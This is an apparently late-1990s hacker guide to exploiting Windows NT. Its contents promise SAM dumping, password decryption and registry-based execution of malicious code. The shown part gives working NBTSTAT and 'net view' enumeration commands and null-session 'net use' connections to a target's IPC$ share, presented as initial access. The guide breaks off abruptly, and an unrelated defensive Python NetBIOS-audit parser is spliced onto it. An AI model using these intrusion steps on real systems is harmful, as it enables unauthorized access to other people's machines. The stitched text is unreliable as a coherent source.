Windows NT Deconstruction Tactics Step by Step
NT Exploitation Techniques
by vacuum of Rhino9 & Technotronic
[email protected]
Revision 5, 10/01/98

Changes in Revision 5:
  Refined some NET.EXE examples.
  Included brief discussion of NetBus.
  Samba rdisk /s information.
  Made this .zip more like a unix rootkit by including all the mentioned tools.
  Cleaned up the overall layout.

I.   Initial Access Strategy
     1.) NetBIOS Shares Using Microsoft Executables
         a. NET.EXE's other uses
     2.) NAT, The NetBIOS Auditing Tool
II.  FrontPage Exploitation
     1.) FrontPage password decryption on unix servers with FrontPage extensions.
III. Registry Vulnerabilities
     1.) rdisk /s to dump the SAM (Security Account Manager)
     2.) Gaining access to the registry with the AT.EXE command (local)
     3.) REGEDT32.EXE and REGEDIT.EXE
     4.) REGINI.EXE and REGDMP.EXE remote registry editing tools
     5.) Using the Registry to Execute Malicious Code
IV.  Trojan .lnk (shortcuts)
     1.) Security hole within winnt\profiles and login scripts
V.   Workarounds for common system policy restrictions
VI.  PWDUMP Example

Included Files:
  NTExploits.txt  this document
  samproof.txt    example of the SAM hive from the registry
  notepad.reg     Example .reg file that starts up notepad.exe upon login. Could be a service.
  service.pwd     Service.pwd FrontPage password example.

NetBIOS Shares Using the standard Microsoft Executables

  C:\>NBTSTAT -A
  C:\>NBTSTAT -a www.target.com

  NetBIOS Remote Machine Name Table

     Name               Type         Status
  ---------------------------------------------
  STUDENT1       <20>  UNIQUE      Registered
  STUDENT1       <00>  UNIQUE      Registered
  DOMAIN1        <00>  GROUP       Registered
  DOMAIN1        <1C>  GROUP       Registered
  DOMAIN1        <1B>  UNIQUE      Registered
  STUDENT1       <03>  UNIQUE      Registered
  DOMAIN1        <1E>  GROUP       Registered
  DOMAIN1        <1D>  UNIQUE      Registered
  ..__MSBROWSE__.<01>  GROUP       Registered

  MAC Address = 00-C0-4F-C4-8C-9D

After a NetBIOS share is found, it can be added to the LMHOSTS file.
Computername <03> UNIQUE Registered by the messenger service. This is the computer to be added to the LMHOSTS file, which is not necessary for NAT.EXE but is necessary if you would like to view the remote computer in Network Neighborhood.

Example of LMHOSTS file:

  student1 target2

Now you can use the Find Computer option within NT or 95 to browse the shares. An alternative option would be to use the very powerful NET.EXE:

  C:\>net view
  C:\>net view \\student1

  Shared resources at

  Share name   Type         Used as  Comment
  ------------------------------------------------------------------------------
  NETLOGON     Disk                  Logon server share
  Test         Disk
  The command completed successfully.

NOTE: The C$, ADMIN$ and IPC$ shares are hidden and are not shown.

To connect to the ipc$ using a null session:

  C:\>net use \\\ipc$ "" /user:""
  The command completed successfully.

To connect to a normal share:

  C:\>net use x: \\\test
  The command completed successfully.

Now the command prompt or the NT Explorer can be used to access the remote drive X.

  C:\>net use
  New connections will be remembered.
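The same NBTSTAT name table is what a defender reads when auditing which hosts still advertise NetBIOS services on ports 137-139 and which of them expose the Server service. The parser below is an added example, not part of the original text or the Rhino9 tools: it decodes the suffix codes using the meanings Microsoft documents for them, and the sample input is the table quoted above, embedded as a constructed string.

```python
import re

# NetBIOS suffixes as documented by Microsoft, keyed on (suffix, type): <00> is the Workstation service for a UNIQUE name but the domain name for a GROUP name.
SUFFIX_MEANING = {
    ("00", "UNIQUE"): "Workstation service",
    ("00", "GROUP"): "Domain/workgroup name",
    ("01", "GROUP"): "Master browser (__MSBROWSE__)",
    ("03", "UNIQUE"): "Messenger service",
    ("1B", "UNIQUE"): "Domain master browser",
    ("1C", "GROUP"): "Domain controllers",
    ("1D", "UNIQUE"): "Master browser",
    ("1E", "GROUP"): "Browser service elections",
    ("20", "UNIQUE"): "File server service (shares reachable over NetBIOS)",
}

# One table row: name, <suffix>, UNIQUE|GROUP, status. Header, separator and MAC lines do not match.
ROW = re.compile(r"^\s*(\S.*?)\s*<([0-9A-F]{2})>\s+(UNIQUE|GROUP)\s+(\w+)\s*$")

# Constructed sample input: the NBTSTAT -A table quoted in the text above.
SAMPLE = """\
NetBIOS Remote Machine Name Table
   Name               Type         Status
---------------------------------------------
STUDENT1       <20>  UNIQUE      Registered
STUDENT1       <00>  UNIQUE      Registered
DOMAIN1        <00>  GROUP       Registered
DOMAIN1        <1C>  GROUP       Registered
DOMAIN1        <1B>  UNIQUE      Registered
STUDENT1       <03>  UNIQUE      Registered
DOMAIN1        <1E>  GROUP       Registered
DOMAIN1        <1D>  UNIQUE      Registered
..__MSBROWSE__.<01>  GROUP       Registered
MAC Address = 00-C0-4F-C4-8C-9D
"""

def parse_nbtstat(text):
    """Return one (name, suffix, type, status, meaning) tuple per table row."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            name, suffix, ntype, status = m.groups()
            meaning = SUFFIX_MEANING.get((suffix, ntype), "undocumented suffix")
            rows.append((name, suffix, ntype, status, meaning))
    return rows

def exposure_summary(rows):
    """Host name, domain and advertised roles; <00> entries are identity, not roles."""
    host = next((n for n, s, t, _, _ in rows if (s, t) == ("00", "UNIQUE")), None)
    domain = next((n for n, s, t, _, _ in rows if (s, t) == ("00", "GROUP")), None)
    roles = sorted({m for _, s, _, _, m in rows if s != "00" and m != "undocumented suffix"})
    return {"host": host, "domain": domain, "roles": roles}
```

Run on the sample, the summary shows STUDENT1 in DOMAIN1 advertising the File server service among its roles, which is the entry to act on (filter 137-139 at the perimeter or stop the Server service on hosts that need no shares).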